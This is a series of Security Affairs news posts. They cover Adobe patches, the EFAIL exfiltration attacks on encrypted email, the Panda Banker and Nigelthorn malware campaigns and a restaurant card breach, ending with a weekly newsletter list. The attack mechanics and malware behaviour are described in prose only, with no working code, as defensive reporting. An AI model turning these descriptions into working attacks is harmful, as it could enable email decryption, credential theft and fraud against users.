“Adobe has released updates for Photoshop CC for Windows and macOS. These updates resolve a criticalvulnerability in Photoshop CC 19.1.3 and earlier 19.x versions, as well as 18.1.3 and earlier 18.x versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory.

Adobe Flash player

A few days ago, Adobe has released security updates to address several vulnerabilities in its products, including Flash Player, Creative Cloud and Connect products.

The security updates also address a Critical Code Execution vulnerability in Flash Player tracked as CVE-2018-4944. The flaw is a critical type confusion that could be exploited to execute arbitrary code, the good news is that Adobe has rated the flaw with a rating of “2” because the company considers not imminent the development of exploit code.

 

Pierluigi Paganini

(Security Affairs – Adobe, cyber security)

The post Adobe issued security updates for 47 vulnerabilities in Acrobat DC and Reader appeared first on Security Affairs.

Researchers disclosed details of EFAIL attacks on in PGP and S/MIME tools. Experts believe claims are overblown

EFAIL attacks – Researchers found critical vulnerabilities in PGP and S/MIME Tools, immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.

A few hours ago, I reported the news that security researchers from three universities in Germany and Belgium have found critical vulnerabilities in PGP and S/MIME Tools that could be exploited by attackers to read emails encrypted with OpenPGP and S/MIME.

Pretty Good Privacy is the open source end-to-end encryption standard used to encrypt emails, while S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.

The existence of the vulnerabilities was also confirmed by the researchers at the Electronic Frontier Foundation (EFF) that recommended users to uninstall Pretty Good Privacy and S/MIME applications until the issued are fixed.

The experts initially planned on disclosing details on Tuesday morning, but they later decided to publicly share their findings due to wrong information circulating online.

The experts disclosed two variant of the attack dubbed EFAIL, in both scenarios hackers need to be in a position of intercepting encrypted emails, for example hacking the target email account or conducting a man-in-the-middle (MitM) attack.

“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers.

“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”

The attacker manipulates the ciphertext in the protected emails and sends a modified message containing custom HTML code to the original receiver or sender.

EFAIL attack

The first attack technique, dubbed direct exfiltration attack, exploits vulnerabilities in the Apple Mail (for iOS and macOS) and Mozilla Thunderbird email clients. The attacker sends the targeted user a specially crafted multipart email with three HTML body parts. When the victim’s client will open and decrypt the email, the attacker’s code causes the application to send the text to a server controlled by the attacker.

The direct exfiltration technique could be used against both PGP and S/MIME.

The second technique, named a CBC/CFB gadget attack, exploits vulnerabilities in the OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689). In the attack scenario, the victim needs to be in possession of their private key, if the private key has been lost the techniques cannot be used.

“He then sends the manipulated email to one of the original receivers, or to the original sender. He may hide this by choosing new FROM, DATE and SUBJECT fields, and he may hide the manipulated ciphertext by hiding it within an invisible iFrame. Thus the attack mail the victim receives looks unsuspicious” reads the research paper published by the experts.

“Once he opens the email in his client, the manipulated ciphertext will be decrypted – first the private key of the victim is used to decrypt the session key s, and then this session key is used to decrypt the manipulated ciphertext c. The decrypted plaintext now contains, due to the manipulations, an exfiltration channel (e.g., an HTML hyperlink) that will send the decrypted plaintext as a whole or in parts to the attacker,” researchers wrote in their paper on EFAIL.

The CBC/CFB gadget attack is effective against PGP, researchers observed a success rate of 33%.

Test results show the EFAIL attack work against 25 of 35 tested S/MIME email clients and 10 of 28 tested OpenPGP clients.

“Our analysis shows that EFAIL plaintext exfiltration channels exist for 25 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients.” states the blog post.

“While it is necessary to change the OpenPGP and S/MIME standards to reliably fix these vulnerabilities, Apple Mail, iOS Mail and Mozilla Thunderbird had even more severe implementation flaws allowing direct exfiltration of the plaintext that is technically very easy to execute.” 

Many security experts downplayed the importance of the EFAIL attack techniques explaining that the attacks work only against buggy email clients.

EFAIL attacks can be mitigated by not using HTML for incoming emails, patches released by email client developers could prevent the attacks.

Pierluigi Paganini

(Security Affairs – privacy, EFAIL)

The post Researchers disclosed details of EFAIL attacks on in PGP and S/MIME tools. Experts believe claims are overblown appeared first on Security Affairs.

PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media

 

Security firm F5 detailed recently discovered campaigns leveraging the Panda Banker malware to target financial institution, the largest one aimed the banks in the US.

Researchers at security firm F5 recently detected several campaigns leveraging the Panda Banker malware to target financial institution, the largest one aimed the banks in the US.

In March, security researchers at Arbor Networks discovered a threat actor targeting financial institutions in Japan using the latest variant of the Panda Banker banking malware (aka Zeus Panda, PandaBot).

Panda Banker was first spotted in 2016 by Fox-IT, it borrows code from the Zeus banking Trojan and is sold as a kit on underground forums, In November 2017, threat actors behind the Zeus Panda banking Trojan leveraged black Search Engine Optimization (SEO) to propose malicious links in the search results. Crooks were focused on financial-related keyword queries.

The main feature of the Panda Banker is the stealing of credentials and account numbers, it is able to steal money from victims by implementing “man in the browser” attack.

According to F5, the malware continues to target Japanese institutions and it is also targeting users in the United States, Canada, and Latin America.

“We analyzed four campaigns that were active between February and May of 2018. The three May campaigns are still active at the time of this writing. Two of the four campaigns are acting from the same botnet version but have different targets and different command and control (C&C) servers.” reads the analysis published by F5.

“Panda is still primarily focused on targeting global financial services, but following the worldwide cryptocurrency hype, it has expanded its targets to online cryptocurrency exchanges and brokerage services. Social media, search, email, and adult sites are also being targeted by Panda.”

Experts observed a spike in the activity associated with the malware in February when the malicious code was used to target financial services and cryptocurrency sites in Italy with screenshots rather than webinjects. With this technique, the attackers are able to spy on user interaction at cryptocurrency accounts.

“The Panda configuration we analyzed from February was marked as botnet “onore2.” This campaign leverage the same attack techniques as previously described, and it is able to keylog popular web browsers and VNC in order to hijack user interaction session and steal personal information.” states the analysis.

Panda-banker-by-industry

In May, the experts monitored three different Panda Banker campaigns each focused on different countries.

One of them, tracked by F5 as botnet “2.6.8,” had targets in 8 industries in North America, most of the targets (78%) are US financial organizations.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” says F5.

Experts discovered that the same botnet 2.6.8 is also targeting Japanese financials as well.

Comparison of the two botnet configurations reveals that when Zeus.Panda is targeting Japan, the authors removed the Content Security Policy (CSP) headers: remove_csp  – 1 : The CSP header is a security standard for preventing cross-site scripting (XSS), clickjacking and other code injection attacks that could execute malicious code from an otherwise trusted site.

This last campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, and Google.com, Facebook, Twitter, and a couple of two sites.

The third campaign aimed at financial institutions in Latin America, most of them in Argentina, Columbia, and Ecuador, The same campaign also targeted social media, search, email, entertainment, and tech provider as the other attacks.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.

Pierluigi Paganini

(Security Affairs – Panda Banker, malware)

The post PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media appeared first on Security Affairs.

Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email

Researchers found critical vulnerabilities in PGP and S/MIME Tools, immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.

If you are one of the users of the email encryption tools Pretty Good Privacy and S/MIME there is an important warning for you.

A group of European security expert has discovered a set of critical vulnerabilities in PGP and S/Mime encryption tools that could reveal your encrypted emails in plain text, also the ones you sent in the past.

Pretty Good Privacy is the open source end-to-end encryption standard used to encrypt emails, while S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.

Sebastian Schinzel, a professor of Computer Security at the Münster University of Applied Sciences, warned the Pretty Good Privacy (PGP) might actually allow Pretty Grievous P0wnage due to vulnerabilities and the worst news is that currently there are no reliable fixes.

The existence of the vulnerabilities was also confirmed by the researchers at the Electronic Frontier Foundation (EFF), the organization also recommended users to uninstall Pretty Good Privacy and S/MIME applications until the issued are fixed.

“A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.” reads the blog post published by the EFF. 

“Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.”

PGP and S/MIME Tools, hacking encryption

The EFF also provided links to guides on how to temporarily disable PGP plug-ins in for Thunderbird with EnigmailApple Mail with GPGTools, and Outlook with Gpg4win.

“Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email,” states the advisory.

Schnizel will disclose full details on Tuesday morning at 0700 UTC.

Stay tuned!

Pierluigi Paganini

(Security Affairs – privacy, hacking)

The post Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email appeared first on Security Affairs.

Chili’s restaurant chain is the last victim of a Payment Card Breach

Brinker International warns customers who recently paid with their payment card at a Chili’s restaurant may have had their financial data stolen by crooks.

On May 11, Brinker International company, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries worldwide, announced to have suffered a data breach.

“This notice is to make you aware that some Chili’s restaurants have been impacted by a data incident, which may have resulted in unauthorized access or acquisition of your payment card data, and to provide you information on steps you can take to protect yourself and minimize the possibility of misuse of your information.” reads the notice issued by Brinker.

The company issued a notice to warn people that recently used their payment cards at a  Chili’s restaurant of a possible data breach, according to the initial investigation crooks infected payment systems with a malware.

Chili’s restaurant

Cybercriminals siphoned payment card data from some Chili’s restaurants between March and April 2018. The malicious code was used to harvest credit and debit card numbers as well as cardholder names from PoS systems in the restaurants.

“Based on the details of the issue currently uncovered, we believe that malware was used to gather payment card information including credit or debit card numbers as well as cardholder names from our payment-related systems for in-restaurant purchases at certain Chili’s restaurants. Currently, we believe the data incident was limited to between March – April 2018; however, we continue to assess the scope of the incident.” continues the note.

“Chili’s does not collect certain personal information (such as social security number, full date of birth, or federal or state identification number) from Guests. Therefore, this personal information was not compromised.”

The company highlighted that it does not collect social security numbers, dates of birth or other personal information, it immediately activated the incident response plan and is currently working with third-party forensic experts to investigate the incident.

Brinker advised customers to monitor their bank and credit card statements for any suspicious activity. Customers can visit a web page set up by the company to receive more information on the data breach and updates on this event.

Major restaurant chains are a privileged target for cybercriminals, last year many companies suffered a data breach including Amazon’s Whole Foods MarketArby’s, and Chipotle.

Pierluigi Paganini

(Security Affairs – Brinker, Chili’s restaurant data breach)

The post Chili’s restaurant chain is the last victim of a Payment Card Breach appeared first on Security Affairs.

Nigelthorn malware infected over 100,000 systems abusing Chrome extensions

The Nigelthorn malware has already infected over 100,000 systems in 100 countries by abusing a Google Chrome extension called Nigelify.

A new strain of malware, dubbed Nigelthorn malware because it abuses a Google Chrome extension called Nigelify, has already infected over 100,000 systems in 100 countries, most of them in the Philippines, Venezuela, and Ecuador (Over 75%).

The new malware family is capable of credential theft, cryptomining, click fraud, and other malicious activities.

According to the experts, the threat actor behind this campaign has been active since at least March 2018.

The Nigelthorn malware is spreading through links on Facebook, victims are redirected to a fake YouTube page that asks them to download and install a Chrome extension to play the video. Once the victims accepted the installation, the malicious extension will be added to their browser.

“Radware has dubbed the malware “Nigelthorn” since the original Nigelify application replaces pictures to “Nigel Thornberry” and is responsible for a large portion of the observed infections.” reads the analysis published by Radware.

“The malware redirects victims to a fake YouTube page and asks the user to install a Chrome extension to play the video.”

The malware was specifically developed to target both Windows and Linux machines using the Chrome browser.

When a victim clicks on “Add Extension” is redirected to a Bitly URL from which they will be redirected to Facebook in the attempt to provide the credentials for his account.

In order to bypass Google Application validation tools, the threat actors used copycat versions of legitimate extensions and injected a short, obfuscated malicious script into them.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” reads the analysis.

After the malicious extension is installed, a JavaScript is executed to start the attack by downloading the malware configuration from the command and control (C&C) server, after which a set of requests is deployed.

The Nigelthorn malware is able to steal Facebook login credentials and Instagram cookies. The malware also redirects users to a Facebook API to generate an access token that is then sent to the Command and Control servers.

The malware propagated by using the stolen credentials, it sends the malicious link to the victim’s network either via messages in Facebook Messenger, or via a new post that includes tags for up to 50 contacts.

The Nigelthorn malware also downloads a cryptomining tool to the victim’s computer.

“The attackers are using a publicly available browser-mining tool to get the infected machines to start mining cryptocurrencies.” states Radware. “The JavaScript code is downloaded from external sites that the group controls and contains the mining pool. Radware observed that in the last several days the group was trying to mine three different coins (Monero, Bytecoin and Electroneum) that are all based on the “CryptoNight” algorithm that allows mining via any CPU.”

The malicious code uses numerous techniques to gain persistence on the infected system, such as closing the extensions tab if the user attempts to access it, or downloading URI Regex from the C&C and blocking users from accessing Facebook and Chrome cleanup tools or from making edits, deleting posts, and posting comments.

Experts also described a YouTube fraud, the YouTube plugin is downloaded and executed, after which the malware attempts to access the URI “/php3/youtube.php” on the C&C to receive commands to watch, like, or comment on a video, or to subscribe to the page. These actions are likely an attempt to receive payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” concludes Radware.

Pierluigi Paganini

(Security Affairs – Nigelthorn malware, Facebook)

The post Nigelthorn malware infected over 100,000 systems abusing Chrome extensions appeared first on Security Affairs.

Security Affairs newsletter Round 162 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      European Central Bank announced a framework for cyber attack simulation on financial firms
·      Google announces the open-source Asylo framework for confidential computing
·      New ZooPark APT targets Android users in Middle East since 2015
·      A new report sheds the lights on state-sponsored Chinese APTs under Winnti umbrella
·      Chrome freezes PC running Windows OS after Windows 10 April update
·      SynAck ransomware Employs Many Novel Techniques to Avoid Detection
·      Experts released an unofficial patch for Zero-Days in Dasan GPON home routers
·      Hackers continue to hack Drupal installs to install backdoors and inject cryptocurrency malware
·      Reading the 2017 Internet Crime Complaint Center (IC3) report
·      Secret Conversation – Twitter is testing End-to-End Encryption for direct messages
·      UPDATED – Critical RCE vulnerability found in over a million GPON Home Routers
·      Adobe fixed a Critical Code Execution issue in Flash Player
·      Are you using Python module ‘SSH Decorator? Newer versions include a backdoor
·      baseStriker attack technique allow to bypass Microsoft Office 365 anti-phishing filter
·      May 2018 Android Security Bulletin includes additional Meltdown fix
·      May 2018 Patch Tuesday: Microsoft fixes 2 zero-day flaws reportedly exploited by APT group
·      Signal disappearing messages can be recovered by the macOS client
·      Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack
·      Lenovo releases updates to fix Secure Boot flaw in servers and other issues
·      Misinterpretation of Intel docs is the root cause for the CVE-2018-8897 flaw in Hypervisors and OSs
·      The source code of the TreasureHunter PoS Malware leaked online
·      Allanite threat actor focused on critical infrastructure is targeting electric utilities and ICS networks
·      Mining passwords from dozens of public Trello boards
·      Tech giant Telstra warns cloud customers theyre at risk of hack due to a SNAFU
·      Throwhammer, the new Rowhammer attack to remotely hack systems over the LAN
·      Google addresses critical security vulnerabilities in Chrome 66
·      iVideon Russian-based video surveillance solution leaked data, hundreds of thousands of records exposed
·      Wannacry outbreak anniversary: the EternalBlue exploit even more popular now

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 162 – News of the week appeared first on Security Affairs.